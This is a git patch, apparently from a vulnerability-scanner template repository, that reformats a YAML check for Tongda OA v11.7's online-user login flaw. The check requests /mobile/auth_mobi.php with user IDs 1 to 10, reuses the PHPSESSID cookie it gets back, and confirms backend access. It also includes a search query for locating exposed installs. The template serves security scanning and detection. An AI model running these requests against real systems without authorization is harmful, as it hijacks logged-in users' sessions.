From 8f46d8f4b85e3495a96e8a830487f213356ba15a Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 18 Jul 2023 13:39:44 +0530
Subject: [PATCH] lint fix and update format

---
 .../tongda/tongda-online-user-login.yaml      | 29 ++++++++-----------
 1 file changed, 12 insertions(+), 17 deletions(-)

diff --git a/http/vulnerabilities/tongda/tongda-online-user-login.yaml b/http/vulnerabilities/tongda/tongda-online-user-login.yaml
index 2d35e01602..6a73fe0c99 100644
--- a/http/vulnerabilities/tongda/tongda-online-user-login.yaml
+++ b/http/vulnerabilities/tongda/tongda-online-user-login.yaml
@@ -7,36 +7,31 @@ info:
   description: |
     Tongda OA is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., LTD v11.7 has the interface query online user function, when the user is online, it will return PHPSESSION so that it can log in to the background system.
   reference:
-   - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/
+    - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/
   metadata:
     zoomeye-query: app:"通达OA"
   tags: tongda,bypass
 
 http:
   - raw:
-    - | 
-      GET /mobile/auth_mobi.php?isAvatar=1&uid={{uid}}&P_VER=0 HTTP/1.1
-      Host: {{Hostname}}
+      - |
+        GET /mobile/auth_mobi.php?isAvatar=1&uid={{uid}}&P_VER=0 HTTP/1.1
+        Host: {{Hostname}}
 
-    - |-
-      GET /general/ HTTP/1.1
-      Host: {{Hostname}}
+      - |-
+        GET /general/ HTTP/1.1
+        Host: {{Hostname}}
  
+    payloads:
+      uid: [1,2,3,4,5,6,7,8,9,10]
+
     cookie-reuse: true
-    req-condition: true
     stop-at-first-match: true
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 200"
-          - "status_code_2 == 200"
+          - "status_code_1 == 200 && status_code_2 == 200"
           - "len(body_1) == 0"
+          - "contains(body_2,'uid:') && contains(body_2,'loginUser')"
           - "contains(header_1,'PHPSESSID=')"
-          - "contains(body_2,'uid:')"
-          - "contains(body_2,'loginUser')"
         condition: and
-
-    payloads:
-      product: 
-      uid: [1,2,3,4,5,6,7,8,9,10]
\ No newline at end of file